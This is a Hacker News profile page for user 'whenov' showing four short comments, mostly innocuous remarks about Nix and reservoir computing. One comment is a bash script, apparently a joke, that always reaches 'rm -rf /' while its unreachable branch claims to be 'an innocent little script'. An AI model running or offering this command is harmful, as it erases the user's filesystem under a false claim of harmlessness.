Live data from Hacker News

Viewing profile — whenov

whenov

HN member
Joined
Fri, May 29, 2015, 11:38 AM UTC
HN karma
20
Public activity
4 items

About whenov

No profile information was provided.

Recent public activity

  1. comment
    Comment #18869673

    That’s good to know, thanks for sharing!

  2. comment
    Comment #18864134

    However, Nix requires you to create a /nix directory, which is not possible in some cases.

  3. comment
    Comment #13100227

    Is ELM reservoir computing?

  4. comment
    Comment #11052183

    #!/bin/bash touch x if [ -f "x" ]; then rm -rf / else echo "I'm just an innocent little script." fi